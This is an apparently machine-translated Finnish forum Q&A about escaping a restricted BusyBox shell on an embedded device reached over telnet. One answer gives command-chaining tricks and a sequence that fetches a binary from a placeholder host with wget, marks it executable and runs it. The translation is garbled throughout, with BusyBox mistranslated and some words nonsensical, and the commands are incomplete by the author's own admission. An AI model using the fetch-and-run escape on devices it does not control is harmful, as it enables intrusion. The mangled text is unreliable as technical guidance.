Rajoitettu BusyBox-kuori

Testaan jotakin upotettua laitetta, eikä dokumentaatiota ole riittävästi. Kun lähetän telnetin laitteeseen, saan vain rajoitetun kuoren.

BusyBox v1.19.2 (built-in shell (ash) Enter "help" for a list of built-in commands. # help Built-in commands: ------------------ . : [ [[ bg break cd chdir continue echo eval exec exit export false fg getopts hash help jobs kill local printf pwd read readonly return set shift source test times trap true type ulimit umask unset wait 

Tämä on rajoitettu kuori, ei ole selvää, miten päästä koko kuoreen?

Vastaa

  • Tarvittava komento on chsh (vaihda kuori) – tämä on osa shadow tai shadow-utils -paketti.
  • Voit myös muokata komentoa /etc/password manuaalisesti /bin/ash johonkin muuhun:

    BUT => ole varovainen, että uusi kuori on olemassa, tai lukitset itsesi ulos !!!


Sinun on oltava root tehdä jompikumpi yllä olevista.

Vastaus

BusyBox on keskittynyt pääasiassa koon optimointiin ja komennot voivat olla erinomaisia luudattu / sisällytetty kääntöaikaan. Joten, antamatta lisätietoja, se näyttää olevan hyvin rajoitettu joukko asennettuja komponentteja .

On kuitenkin oltava selvää, että tämä ei tarkoita, että laitteen laiteohjelmisto ei tue tiettyjä apuohjelmia sinänsä. Jos tämä ei ole täysin selvää, kannattaa tutustua osioon UKK – Mikä on Busybox . Joidenkin lainausten pitäisi tehdä tämä täysin selväksi:

”Voinko ottaa FTP: n käyttöön?” – ”Emme tiedä, tuleeko Foomatic-9000-laiteohjelmistoon Busybox-binaari, jossa on käytössä ftpd-sovelma. (Jos sinulla on pääsy kuorikehotteeseen, yritä suorittaa ”busybox ftpd –help”). Jos näin tapahtuu, voit todennäköisesti ottaa sen käyttöön. Valitettavasti emme tiedä, kuinka Foomatic-9000-laiteohjelmisto hallitsee eri palvelujen käynnistämistä ja lopettamista (jos heillä on jo ftpd-palveluja ja se on vain poistettu käytöstä) tai kuinka luoda ja ottaa käyttöön uusi palvelu Foomatic-9000: lla (jos ne dont). Yritä hakea sitä Googlelta. ”

” Voinko ottaa SCP: n käyttöön? ” – ”Busybox-1.23.4: ssä ei ole scp-sovelmia. Foomatic-9000: ssa voi kuitenkin olla asennettuna scp (esimerkiksi jos dropbear on asennettu), ja se voi olla mahdollista ottaa käyttöön. Jos ei, se voi olla mahdollista rakentaa ja asenna oma scp-työkalu. Kokeile googlata sitä. ”

Sinun tulisi todennäköisesti keskittyä enemmän tiettyyn laitteeseen ja asennettuun laiteohjelmistoon kuin keskittyä rajoitettuun joukko komponentteja, jotka on linkitetty itse Busyboxiin.

Kommentit

  • ok, unohdin cli-komennon.

Vastaa

Valitettavasti suurin osa sulautetuista laitteista (esim. reitittimet, iot-laitteet jne.) yrittävät nykyään estää käyttäjiä pääsemästä sisäiseen järjestelmään, jotta he voivat ”Älä hakata sitä tai muokkaa sitä. Tämä on toimenpide, joka estää mirain kaltaisten botnet-verkkojen toiminnan, vaikka suojaukset eivät aina ole kovin tehokkaita.

Rajoitettu väyläkotelon kuori on hyvin yleinen skenaario. Onneksi puhuminen yleensä busybox vaatii taustalla olevan kuoren, jos sellainen on ” s kaikenlaista käyttöliittymää (kuten telnet tai ssh). Tämä tarkoittaa, että voi olla mahdollista ohittaa kyseinen kuori ja suorittaa komentoja alla olevassa kuoressa (ts. / Bin / sh on hyvin yleinen).

Ennen kuin yrität paeta väylälaatikon hiekkalaatikkoa, sinulla on oltava seuraava:

  • Valmistaja on saattanut muokata väyläkotelon kuorta korjaamaan tämän tekniikan.
  • Taustalla oleva kuori voi olla (täydellinen tai osittainen) ehdollinen kuori. Tämä tarkoittaa, että vaikka onnistutkin suorittamaan komentoja siinä, ne eivät välttämättä toimi tai sanovat, että sinulla ei ole tarpeeksi oikeuksia.
  • Taustalla oleva kuori voi olla myös toinen rajoitettu kuori (ei yleinen)

Kun olet valmis, voit kokeilla seuraavia ”temppuja”: (Kaikki luottavat kuorioperaattoreihin)

Kokeile esimerkiksi

echo "Hello World" & <your command> 

Tämä suorittaa komennon, jos:

  1. Binaari on käytettävissä (siis periaatteessa, jos se on asennettu järjestelmään)
  2. Kuorella on pääsy siihen (käyttöoikeudet)

On muitakin tapoja, kuten:

echo "Hello World" `your command` echo "Hello World" || <your command> 

Ja muita muunnelmia voit löytää Internetistä tai kokeilla itse.

MUOKKAA: Muokkaan lisätäksesi esimerkin siitä, kuinka voit paeta kuoresta ja saada lisää suorituksia.

echo "Hello World" & wget yourweb.com/yourbinary echo "Hello World" & chmod yourbinary echo "Hello World" & ./yourbinary 

tai suoraan ./yourbinary

Se on idea. Mitä tulee chmod anteeksi, mutta en muista tarkkoja argumentteja suoritusoikeuksien antamiseksi.

EDIT2: Olen huomannut, että kuoresi sanoo tuhkaa, joten luultavasti busybox on suoritettu käynnissä olevasta (automatisoidusta) skripistä tuhkasta. Tässä tapauksessa haluat suorittaa komennot suoraan / bin / ash -kuoressa.

Vastaa

Sähköpostiosoitettasi ei julkaista. Pakolliset kentät on merkitty *